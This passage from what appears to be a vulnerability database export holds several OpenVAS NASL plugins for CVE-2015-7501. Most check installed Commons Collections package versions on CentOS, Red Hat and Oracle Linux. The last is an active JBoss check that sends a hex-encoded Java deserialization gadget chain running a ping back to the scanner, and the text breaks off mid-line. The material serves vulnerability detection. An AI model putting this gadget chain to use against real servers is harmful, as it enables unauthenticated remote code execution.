exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-javadoc\", rpm:\"jakarta-commons-collections-javadoc~3.2.1~3.5.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework\", rpm:\"jakarta-commons-collections-testframework~3.2.1~3.5.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework-javadoc\", rpm:\"jakarta-commons-collections-testframework-javadoc~3.2.1~3.5.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-tomcat5\", rpm:\"jakarta-commons-collections-tomcat5~3.2.1~3.5.el6_7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "openvas", "title": "RedHat Update for jakarta-commons-collections RHSA-2015:2671-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871529", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871529", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for jakarta-commons-collections RHSA-2015:2671-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871529\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-22 05:42:26 +0100 (Tue, 22 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for jakarta-commons-collections RHSA-2015:2671-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Jakarta/Apache Commons Collections library\nprovides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the linked references.\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"jakarta-commons-collections on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2671-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-December/msg00052.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-debuginfo\", rpm:\"jakarta-commons-collections-debuginfo~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-javadoc\", rpm:\"jakarta-commons-collections-javadoc~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework\", rpm:\"jakarta-commons-collections-testframework~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-testframework-javadoc\", rpm:\"jakarta-commons-collections-testframework-javadoc~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections-tomcat5\", rpm:\"jakarta-commons-collections-tomcat5~3.2~2jpp.4\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "openvas", "title": "RedHat Update for jakarta-commons-collections RHSA-2015:2521-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871512\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:38 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Jakarta/Apache Commons Collections\nlibrary provides new interfaces, implementations, and utilities to extend the\nfeatures of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the references.\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"jakarta-commons-collections on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2521-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00070.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "description": "Oracle Linux Local Security Checks ELSA-2015-2522", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2522", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122791", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2522.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122791\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-02 11:24:54 +0200 (Wed, 02 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2522\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2522 - apache-commons-collections security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2522\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2522.html\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.1~22.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apache-commons-collections-javadoc\", rpm:\"apache-commons-collections-javadoc~3.2.1~22.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apache-commons-collections-testframework\", rpm:\"apache-commons-collections-testframework~3.2.1~22.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"apache-commons-collections-testframework-javadoc\", rpm:\"apache-commons-collections-testframework-javadoc~3.2.1~22.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-16T16:49:47", "description": "Jboss is prone to remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-26T00:00:00", "type": "openvas", "title": "Jboss RMI Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310105828", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105828", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jboss RMI Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105828\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-15T08:52:55+0000\");\n script_name(\"Jboss RMI Java Deserialization Vulnerability\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 08:52:55 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-26 12:10:38 +0200 (Tue, 26 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"jboss/detected\");\n\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/security/cve/cve-2015-7501\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which execute a ping against the scanner.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run arbitrary\n code on the Jboss server.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Jboss is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nif( ! port = get_kb_item( \"jboss/port\" ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nvtstrings = get_vt_strings();\nvt_string = vtstrings[\"ping_string\"];\n\nex = raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nif( host_runs(\"Windows\") == \"yes\" )\n{\n cmd = 'ping -c 5 ' + this_host();\n win = TRUE;\n}\nelse\n cmd = 'ping -c 5 -p ' + hexstr(vt_string) + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\nex += len + cmd + 